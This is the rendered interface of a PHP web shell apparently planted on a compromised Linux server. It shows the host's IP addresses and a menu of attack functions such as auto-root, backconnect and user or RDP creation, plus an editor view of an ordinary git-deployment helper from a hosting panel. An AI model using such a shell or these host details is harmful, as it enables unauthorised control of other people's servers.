Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.140.197.130
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
panel /
mod /
base /
git_tool /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.py
50
B
-rw-r--r--
install.py
1.04
KB
-rw-r--r--
install.sh
565
B
-rw-r--r--
tool.py
19.66
KB
-rw-r--r--
util.py
1.22
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tool.py
"""Git helpers for site directories: remote branch listing, pulling and config storage.

``GitTool`` drives the git binary through shell commands inside a scratch
directory under ``GIT_TMP_PATH``; ``RealGitMager`` persists per-site git
settings as JSON; ``GitMager`` adapts request objects to ``RealGitMager`` and
wraps the results with ``json_response``.
"""
import json
import os
import re
import shlex
import shutil
import time
from typing import Optional, Dict, Union, List
from urllib.parse import quote as url_quote

from urllib3.util import parse_url, Url

from mod.base import json_response
from .install import installed, install_git, version_1_5_3
from .util import read_file, write_file, ExecShell, set_ownership

GIT_TMP_PATH = "/www/server/git_tmp"


def _respond(res):
    """Wrap a manager result: a ``str`` is an error message, anything else is data."""
    if isinstance(res, str):
        return json_response(status=False, msg=res)
    return json_response(status=True, data=res)


class GitTool:
    """Run git operations for one project directory against one remote URL."""

    # Extracts branch names from ``git ls-remote`` output.
    _REMOTE_HEAD_RE = re.compile(r"refs/heads/(?P<b>[^\n]*)\n")
    # Captures the key/value lines of the ``[user]`` section of a git config file.
    _USER_SECTION_RE = re.compile(
        r"\[user][^\n]*\n(?P<target>(\s*\w+\s*=\s*[^\n]*\n)*(\s*\w+\s*=\s*[^\n]*)?)(\s*\[)?")

    def __init__(self, project_path: str, git_url: str, user_config: Optional[dict] = None, git_id: str = ""):
        """Remember the target directory, remote URL and credentials.

        :param project_path: directory the repository content is deployed into.
        :param git_url: remote repository URL.
        :param user_config: optional dict of git ``user.*`` values (``name``,
            ``password``, ``email``); when omitted, the ``[user]`` section of
            ``<project_path>/.git/config`` is used if present.
        :param git_id: identifier used to name the pull log file.
        """
        self.git_url = git_url
        # NOTE: the attribute name ``get_id`` is kept as-is; other code may read it.
        self.get_id = git_id
        self.project_path = project_path
        # endswith() is safe on an empty string, unlike indexing [-1].
        if self.project_path.endswith('/'):
            self.project_path = self.project_path[:-1]

        os.makedirs(GIT_TMP_PATH, exist_ok=True)

        self._tmp_path: Optional[str] = None
        self._askpass_path: Optional[str] = None
        self.user_config = user_config
        _conf = self.get_user_config_by_project_path()
        if _conf and not self.user_config:
            self.user_config = _conf

        self._init_tmp_path = False

    def _resolve_paths(self) -> None:
        """Derive the scratch dir and askpass script paths from the project dir's inode."""
        if not os.path.isdir(self.project_path):
            return
        ino = os.stat(self.project_path).st_ino
        self._tmp_path = "{}/{}".format(GIT_TMP_PATH, str(ino))
        self._askpass_path = "{}/help_{}.sh".format(GIT_TMP_PATH, str(ino))

    @property
    def tmp_path(self) -> Optional[str]:
        """Scratch directory for this project, or ``None`` if the project dir is missing."""
        if self._tmp_path is None:
            self._resolve_paths()
        return self._tmp_path

    def get_user_config_by_project_path(self) -> Optional[dict]:
        """Return the ``[user]`` settings from the project's own ``.git/config``, if any."""
        config_file = self.project_path + "/.git/config"
        if os.path.isfile(config_file):
            git_config = read_file(config_file)
            if isinstance(git_config, str):
                return self._read_user_conf_by_config(git_config)
        return None

    @property
    def askpass_path(self) -> Optional[str]:
        """Path of the GIT_ASKPASS helper script, or ``None`` if the project dir is missing."""
        if self._askpass_path is None:
            self._resolve_paths()
        return self._askpass_path

    def _setup_tmp_path(self) -> Optional[str]:
        """Prepare the scratch repository and the askpass helper.

        :return: ``None`` on success, otherwise an error message.
        :raises ValueError: propagated from :meth:`git_bin` when git is unavailable.
        """
        if not os.path.isdir(self.project_path):
            return "目标目录:【{}】不存在,无法进行git操作".format(self.project_path)

        if not os.path.exists(self.tmp_path):
            os.makedirs(self.tmp_path)
            self._init_tmp_path = True
        elif not self._init_tmp_path:
            # A scratch dir left over from an earlier instance is rebuilt from scratch.
            shutil.rmtree(self.tmp_path)
            os.makedirs(self.tmp_path)

        write_file(self.askpass_path, "")
        ExecShell("chmod +x " + shlex.quote(self.askpass_path))
        if os.path.isdir(self.tmp_path + "/.git"):
            return None

        git_bin = shlex.quote(self.git_bin())
        # The URL may come from user input: quote everything placed on a shell line.
        sh_str = "cd {tmp_path}\n{git_bin} init .\n{git_bin} remote add origin {git_url}\n".format(
            tmp_path=shlex.quote(self.tmp_path), git_bin=git_bin, git_url=shlex.quote(self.git_url))
        ExecShell(sh_str)

        if not os.path.isfile(self.tmp_path + "/.git/config"):
            return "git Initialization failed"
        git_conf = read_file(self.tmp_path + "/.git/config")
        if not (isinstance(git_conf, str) and git_conf.find("origin") != -1
                and git_conf.find(self.git_url) != -1):
            return "git Failed to set up a remote route"

        if self.git_url.find("ssh://") != -1:
            # Nothing more to configure for ssh remotes.
            return None

        if isinstance(self.user_config, dict):
            sh_str_list = ["cd {}".format(shlex.quote(self.tmp_path))]
            for k, v in self.user_config.items():
                if isinstance(k, str) and isinstance(v, str) and k.strip() and v.strip():
                    sh_str_list.append("{} config {} {}".format(
                        git_bin, shlex.quote("user." + k.strip()), shlex.quote(v.strip())))
            ExecShell("\n".join(sh_str_list))

            # git calls the helper with a prompt starting "Username" or "Password".
            # printf with a quoted argument emits the value verbatim, so quotes or
            # shell metacharacters in the credentials cannot break out of the script.
            askpass_lines = [
                "#!/bin/sh",
                'case "$1" in',
                "Username*) exec printf '%s\\n' {} ;;".format(
                    shlex.quote(str(self.user_config.get('name', "--")))),
                "Password*) exec printf '%s\\n' {} ;;".format(
                    shlex.quote(str(self.user_config.get('password', "--")))),
                "esac",
                "",
            ]
            write_file(self.askpass_path, "\n".join(askpass_lines))
        return None

    def remote_branch(self) -> Union[str, List[str]]:
        """List branch names of the remote.

        :return: list of branch names, or an error string (the setup error, or
            the command's stderr when no branch was found).
        """
        error = self._setup_tmp_path()
        if error:
            return error
        out, err = ExecShell("cd {} && export GIT_ASKPASS={} && {} ls-remote origin".format(
            shlex.quote(self.tmp_path), shlex.quote(self.askpass_path), shlex.quote(self.git_bin())))
        branch_list = [m.group("b") for m in self._REMOTE_HEAD_RE.finditer(out)]
        if not branch_list:
            return err
        return branch_list

    @staticmethod
    def _read_user_conf_by_config(git_config_data: str) -> Optional[dict]:
        """Parse the ``[user]`` section of git config text into a dict.

        :return: mapping of key to value, or ``None`` when there is no ``[user]`` section.
        """
        res = GitTool._USER_SECTION_RE.search(git_config_data)
        if not res:
            return None
        res_data = dict()
        for line in res.group("target").split("\n"):
            if not line.strip():
                continue
            k, sep, v = line.partition("=")
            if not sep:
                # The pattern can swallow a following line that has no "=", e.g. a
                # section header after an empty value; skip it instead of crashing.
                continue
            res_data[k.strip()] = v.strip()
        return res_data

    @classmethod
    def global_user_conf(cls) -> dict:
        """Return ``name``/``password``/``email`` from ``/root/.gitconfig`` (``None`` when unset)."""
        res_dict = {
            "name": None,
            "password": None,
            "email": None,
        }
        global_file = "/root/.gitconfig"
        if not os.path.isfile(global_file):
            return res_dict
        data = read_file(global_file)
        if not isinstance(data, str):
            return res_dict
        res_data = cls._read_user_conf_by_config(data)
        if res_data:  # None when the file has no [user] section
            res_dict.update(res_data)
        return res_dict

    @classmethod
    def set_global_user_conf(cls, data) -> None:
        """Write each non-empty string item of *data* as a global git ``user.<key>`` setting."""
        git_bin = shlex.quote(cls.git_bin())
        for k, v in data.items():
            if isinstance(k, str) and isinstance(v, str) and k.strip() and v.strip():
                ExecShell("{} config --global {} {}".format(
                    git_bin, shlex.quote("user." + k.strip()), shlex.quote(v.strip())))

    @classmethod
    def ssh_pub_key(cls):
        """Return the first existing root SSH public key, creating an ed25519 key if none exists."""
        key_names = ('id_ed25519', 'id_rsa', 'id_ecdsa', 'id_rsa_bt')
        for key_name in key_names:
            key_file = "/root/.ssh/{}".format(key_name)
            # The public key sits next to the private key.
            pub_file = key_file + ".pub"
            if os.path.isfile(pub_file) and os.path.isfile(key_file):
                data = read_file(pub_file)
                if isinstance(data, str):
                    return data
        return cls._create_ssh_key()

    @staticmethod
    def _create_ssh_key() -> str:
        """Generate an ed25519 key pair for root, authorize it, and return the public key text."""
        key_type = "ed25519"
        # NOTE(review): "|echo y" pipes ssh-keygen's output INTO echo; it does not
        # answer an overwrite prompt. Left unchanged because reversing the pipe
        # would overwrite an existing private key - confirm the intended behavior.
        ExecShell("ssh-keygen -t {s_type} -P '' -f /root/.ssh/id_{s_type} |echo y".format(s_type=key_type))
        authorized_keys = '/root/.ssh/authorized_keys'
        pub_file = "/root/.ssh/id_{s_type}.pub".format(s_type=key_type)
        ExecShell('cat %s >> %s && chmod 600 %s' % (pub_file, authorized_keys, authorized_keys))
        key_type_file = '/www/server/panel/data/ssh_key_type.pl'
        write_file(key_type_file, key_type)
        return read_file(pub_file)

    @staticmethod
    def git_bin() -> str:
        """Return the path of the git executable.

        :raises ValueError: when git is not installed and installing it fails.
        """
        if not installed():
            if not install_git():
                raise ValueError("There is no git tool and the installation fails, so this feature cannot be used")
        default = "/usr/bin/git"
        git_path = shutil.which("git")
        if git_path is None:
            return default
        return git_path

    def pull(self, branch, set_own: Optional[str] = None) -> Optional[str]:
        """Clone *branch* into the scratch dir and copy its content over the project dir.

        :param branch: branch name to clone.
        :param set_own: when a string, passed to ``set_ownership`` for the project dir.
        :return: ``None`` on success, otherwise an error message.
        """
        if self.tmp_path is None:
            return "The git target directory does not exist"
        os.makedirs(self.tmp_path, exist_ok=True)

        if self.git_url.startswith(("https://", "http://")):
            res = parse_url(self.git_url)
            conf = self.user_config
            if isinstance(res, Url) and not res.auth \
                    and conf and "name" in conf and "password" in conf:
                # Url is a namedtuple: fields cannot be assigned, build a new one.
                # Credentials are percent-encoded so ":" "@" "/" cannot corrupt the URL.
                auth = "{}:{}".format(url_quote(str(conf["name"]), safe=""),
                                      url_quote(str(conf["password"]), safe=""))
                self.git_url = res._replace(auth=auth).url

        git_name = self.git_name()
        if git_name is None:
            git_name = 'None'
        clone_dir = self.tmp_path + "/" + git_name
        if os.path.isdir(clone_dir):
            shutil.rmtree(clone_dir)

        log_file = "/tmp/git_{}_log.log".format(self.get_id)
        shell_command_str = "cd {0} && {1} clone --progress -b {2} {3} &>> {4}".format(
            shlex.quote(self.tmp_path), shlex.quote(self.git_bin()), shlex.quote(str(branch)),
            shlex.quote(self.git_url), shlex.quote(log_file)
        )
        ExecShell(shell_command_str)
        if not os.path.isdir(clone_dir):
            return "Pull error"

        # The glob must stay outside the quotes so the shell still expands it.
        ExecShell(r"\cp -rf {}/* {}/".format(shlex.quote(clone_dir), shlex.quote(self.project_path)))
        if isinstance(set_own, str):
            set_ownership(self.project_path, set_own)

        if os.path.isdir(clone_dir):
            shutil.rmtree(clone_dir)
        return None

    def git_name(self) -> Optional[str]:
        """Return the repository name (last URL path segment without ``.git``), or ``None``."""
        if not isinstance(self.git_url, str):
            return None
        _, sep, name = self.git_url.rpartition("/")
        if not sep:
            return None
        if name.endswith(".git"):
            name = name[:-4]
        # An empty name would make pull() operate on the scratch dir itself.
        return name or None

    @classmethod
    def new_id(cls) -> str:
        """Return a new 16-character hex identifier."""
        from uuid import uuid4
        return uuid4().hex[::2]


class RealGitMager:
    """Load, modify and persist the per-site git configuration file."""

    _git_config_file = "/www/server/panel/data/site_git_config.json"

    def __init__(self):
        self._config: Optional[Dict[str, List[Dict[str, Union[int, str, dict]]]]] = None
        # Shape of the stored configuration:
        # {
        #     "site_name": [{
        #         "id": "",
        #         "site_name": "aaaa",
        #         "url": "http://git.bt.cn/cjxin/panel-plugin.git",  # or ssh://git@git.bt.cn/cjxin/panel-plugin.git
        #         "path_ino": 4564524,
        #         "git_path": "/www/wwwroot/site",
        #         "config": {
        #             "name": "",
        #             "password": "",
        #             "email": "",
        #         },
        #     }]
        # }

    @property
    def configure(self) -> Dict[str, List[Dict[str, Union[int, str, dict]]]]:
        """The configuration mapping, loaded lazily; empty when missing or unreadable."""
        if self._config is None:
            try:
                res = read_file(self._git_config_file)
                data = {} if res is None else json.loads(res)
            except (json.JSONDecodeError, TypeError, ValueError):
                data = {}
            self._config = data
        return self._config

    def save_configure(self):
        """Write the in-memory configuration back to disk (no-op when empty or not loaded)."""
        if self._config:
            write_file(self._git_config_file, json.dumps(self._config))

    def _find(self, git_id: str, site_name: str) -> Optional[dict]:
        """Return the stored entry with *git_id* under *site_name*, or ``None``."""
        for item in self.configure.get(site_name, []):
            if item["id"] == git_id:
                return item
        return None

    def add_git(self, git_url: str, site_name: str, git_path: str, user_config: Optional[dict]) -> Union[str, list]:
        """Register a repository for a site.

        :return: the remote branch list on success, otherwise an error message.
        """
        url = parse_url(git_url)
        if not (isinstance(url, Url) and url.scheme and url.host and url.path):
            return "The URL format is incorrect"
        if user_config and not (isinstance(user_config, dict)
                                and "name" in user_config and "password" in user_config):
            return "User information is entered incorrectly"
        if not os.path.exists(git_path):
            return "The git target directory does not exist"
        path_ino = os.stat(git_path).st_ino

        site_entries = self.configure.setdefault(site_name, [])
        for c in site_entries:
            if c["path_ino"] == path_ino or git_path == c["git_path"]:
                return "The path already exists, so please do not add it repeatedly"

        try:
            GitTool.git_bin()
        except ValueError as e:
            return str(e)

        git_id = GitTool.new_id()
        git = GitTool(project_path=git_path, git_url=git_url, user_config=user_config, git_id=git_id)
        res = git.remote_branch()
        if isinstance(res, str):
            return res

        site_entries.append(
            {
                "id": git_id,
                "site_name": site_name,
                "url": git_url,
                "path_ino": path_ino,
                "git_path": git_path,
                "remote_branch": res,
                "remote_branch_time": int(time.time()),
                "config": user_config,
            }
        )
        self.save_configure()
        return res

    def modify_git(
            self,
            git_id: str,
            site_name: str,
            git_url: Optional[str],
            git_path: Optional[str],
            user_config: Optional[dict]
    ) -> Optional[str]:
        """Update URL, path and/or credentials of a stored entry.

        The change is saved only if the remote can still be listed.

        :return: ``None`` on success, otherwise an error message.
        """
        target = self._find(git_id, site_name)
        if target is None:
            return 'The specified git configuration does not exist'

        if git_url:
            url = parse_url(git_url)
            if not (isinstance(url, Url) and url.scheme and url.host and url.path):
                return "The URL format is incorrect"
            target["url"] = git_url

        if git_path:
            if not os.path.exists(git_path):
                return "The git target directory does not exist"
            target["path_ino"] = os.stat(git_path).st_ino
            target["git_path"] = git_path

        if user_config:
            if not (isinstance(user_config, dict) and "name" in user_config and "password" in user_config):
                return "User information is entered incorrectly"
            target["config"] = user_config

        git = GitTool(project_path=target['git_path'], git_url=target['url'],
                      user_config=target['config'], git_id=target['id'])
        res = git.remote_branch()
        if isinstance(res, str):
            return res

        self.save_configure()
        return None

    def remove_git(self, git_id: str, site_name: str) -> Optional[str]:
        """Delete a stored entry; return ``None`` on success or an error message."""
        target = self._find(git_id, site_name)
        if target is None:
            return 'The specified git configuration does not exist'

        self.configure[site_name].remove(target)
        self.save_configure()
        return None

    def site_git_configure(self, site_name, refresh: bool = False) -> List[dict]:
        """Return the entries of a site, refreshing remote branches older than one hour.

        :param refresh: force a refresh regardless of age.
        """
        if site_name not in self.configure:
            return []
        res_list = []
        refreshed = False
        for i in self.configure[site_name]:
            if time.time() - i.get("remote_branch_time", 0) > 60 * 60 or refresh:
                g = GitTool(project_path=i['git_path'], git_url=i['url'],
                            user_config=i['config'], git_id=i['id'])
                res = g.remote_branch()
                if isinstance(res, str):
                    i.update(remote_branch_error=res, remote_branch=[], remote_branch_time=int(time.time()))
                else:
                    # Drop an error recorded by an earlier failed refresh.
                    i.pop("remote_branch_error", None)
                    i.update(remote_branch=res, remote_branch_time=int(time.time()))
                refreshed = True
            res_list.append(i)
        if refreshed:
            # Persist the new timestamps; otherwise the one-hour cache never takes
            # effect for the next manager instance.
            self.save_configure()
        return res_list

    @staticmethod
    def set_global_user(name: Optional[str], password: Optional[str], email: Optional[str] = None) -> None:
        """Store the given non-empty values as global git user settings."""
        data = {}
        if name:
            data['name'] = name
        if password:
            data['password'] = password
        if email:
            data['email'] = email
        GitTool.set_global_user_conf(data)

    def git_pull(self, git_id: str, site_name: str, branch: str) -> Optional[str]:
        """Pull *branch* for a stored entry; return ``None`` on success or an error message."""
        target = self._find(git_id, site_name)
        if target is None:
            return 'The specified git configuration does not exist'
        g = GitTool(
            project_path=target['git_path'],
            git_url=target['url'],
            user_config=target['config'],
            git_id=target["id"])
        return g.pull(branch)


class GitMager:
    """Request-facing wrappers: read fields from the request object and reply with ``json_response``."""

    @staticmethod
    def add_git(get):
        """Add git information for a site."""
        user_config = None
        try:
            git_url = get.url.strip()
            site_name = get.site_name.strip()
            git_path = get.git_path.strip()
            if hasattr(get, "config") and get.config.strip():
                user_config = json.loads(get.config.strip())
        except (json.JSONDecodeError, AttributeError, TypeError):
            return json_response(status=False, msg="The parameter is incorrect")
        return _respond(RealGitMager().add_git(git_url, site_name, git_path, user_config))

    @staticmethod
    def modify_git(get):
        """Modify git information of a site."""
        git_url = None
        git_path = None
        user_config = None
        try:
            git_id = get.git_id.strip()
            site_name = get.site_name.strip()
            if "url" in get:
                git_url = get.url.strip()
            if 'git_path' in get:
                git_path = get.git_path.strip()
            if hasattr(get, "user_config") and get.user_config.strip():
                user_config = json.loads(get.user_config.strip())
        except (json.JSONDecodeError, AttributeError, TypeError):
            return json_response(status=False, msg="parameter error")
        return _respond(RealGitMager().modify_git(git_id, site_name, git_url, git_path, user_config))

    @staticmethod
    def remove_git(get):
        """Remove git information of a site."""
        try:
            git_id = get.git_id.strip()
            site_name = get.site_name.strip()
        except (AttributeError, TypeError):
            return json_response(status=False, msg="parameter error")
        return _respond(RealGitMager().remove_git(git_id, site_name))

    @staticmethod
    def site_git_configure(get):
        """Return the git entries of a site; ``refresh`` of "true"/"1" forces a branch refresh."""
        if not version_1_5_3():
            return json_response(status=False, msg="Git versions earlier than 1.5.3 are not available")
        refresh = ''
        try:
            site_name = get.site_name.strip()
            if "refresh" in get:
                refresh = get.refresh.strip()
        except (AttributeError, TypeError):
            return json_response(status=False, msg="parameter error")
        refresh = refresh in ("true", "1")
        return _respond(RealGitMager().site_git_configure(site_name, refresh=refresh))

    @staticmethod
    def set_global_user(get):
        """Set the global git user name/password/email from the request."""
        name = password = email = None
        try:
            if "name" in get:
                name = get.name.strip()
            if "password" in get:
                password = get.password.strip()
            if "email" in get:
                email = get.email.strip()
        except (AttributeError, TypeError):
            return json_response(status=False, msg="parameter error")
        RealGitMager().set_global_user(name, password, email)
        return json_response(status=True, msg="The setup was successful")

    @staticmethod
    def git_pull(get):
        """Pull the requested branch for a stored git entry."""
        try:
            site_name = get.site_name.strip()
            git_id = get.git_id.strip()
            branch = get.branch.strip()
        except (AttributeError, TypeError):
            return json_response(status=False, msg="parameter error")
        return _respond(RealGitMager().git_pull(git_id, site_name, branch))

    @staticmethod
    def git_global_user_conf(get=None):
        """Return the global git user settings (raw dict, not a ``json_response``)."""
        return GitTool.global_user_conf()

    @staticmethod
    def git_ssh_pub_key(get=None):
        """Return root's SSH public key text, generating a key if none exists."""
        return GitTool.ssh_pub_key()
Close